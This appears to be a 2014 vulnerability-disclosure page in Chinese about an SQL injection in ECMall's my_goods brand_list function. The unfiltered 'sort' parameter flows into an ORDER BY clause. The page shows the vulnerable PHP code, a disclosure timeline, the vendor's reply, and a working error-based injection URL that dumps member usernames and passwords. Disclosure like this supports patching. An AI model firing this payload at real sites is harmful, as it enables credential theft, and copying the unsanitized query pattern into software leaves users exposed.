漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:Ecmall某处SQL注射漏洞
提交时间:2014-02-27 10:51
修复时间:2014-05-28 10:51
公开时间:2014-05-28 10:51
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2014-02-27: 细节已通知厂商并且等待厂商处理中 2014-02-27: 厂商已经确认,细节仅向厂商公开 2014-03-02: 细节向第三方安全合作伙伴开放 2014-04-23: 细节向核心白帽子及相关领域专家公开 2014-05-03: 细节向普通白帽子公开 2014-05-13: 细节向实习白帽子公开 2014-05-28: 细节向公众公开
简要描述: 不修复那我就一个一个的提出来
详细说明: 缺陷文件:/app/my_goods.app.php
function brand_list() { if (!empty($_GET['brand_name']) || !empty($_GET['store'])) { $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'"; $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id; } if (isset($_GET['sort']) && isset($_GET['order'])) { $sort = strtolower(trim($_GET['sort'])); //未过滤 $order = strtolower(trim($_GET['order'])); if (!in_array($order,array('asc','desc'))) { $sort = 'store_id'; $order = 'desc'; } } else { $sort = 'store_id'; $order = 'desc'; } $page = $this->_get_page(10); $conditions = $this->_get_query_conditions($con); $brand = $this->_brand_mod->find(array( //跟踪 'conditions' => "(1=1 $conditions)" . $filtered, 'limit' => $page['limit'], 'order' => "$sort $order",//here 'count' => true, )); function find($params = array()) { extract($this->_initFindParams($params)); /* 字段(SELECT FROM) */ $fields = $this->getRealFields($fields); $fields == '' && $fields = '*'; $tables = $this->table . ' ' . $this->alias; /* 左联结(LEFT JOIN) */ $join_result = $this->_joinModel($tables, $join); /* 原来为($join_result || $index_key),忘了最初的用意,默认加上主键应该是只为了为获得索引的数组服务的,因此只跟索引键是否是主键有关 */ if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key))) { /* 如果索引键里有主键,则默认在要查询字段后加上主键 */ $fields .= ",{$this->alias}.{$this->prikey}"; } /* 条件(WHERE) */ $conditions = $this->_getConditions($conditions, true); /* 排序(ORDER BY) */ $order && $order = ' ORDER BY ' . $this->getRealFields($order);//跟踪 …… function getRealFields($src_fields_list) { $fields = $src_fields_list; if (!$src_fields_list) { $fields = ''; } $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields);//对注射语句没有影响 return $fields; } function _getFieldTable($owner) { if ($owner == 'this') { return $this->alias; } else { $m =& m($owner); if ($m === false) { /* 若没有对象,则原样返回 */ return $owner; } return $m->alias; } }
存在注射
漏洞证明:
利用方法: 注册会员开一个店铺 访问:index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23 即可爆出用户名密码
修复方案: 漏洞回应 厂商回应: 危害等级:低
漏洞Rank:3
确认时间:2014-02-27 12:30
厂商回复: 非常感谢您为shopex信息安全做的贡献 改漏洞通过其他渠道已经提交过,并在处理中 谢谢
最新状态: 暂无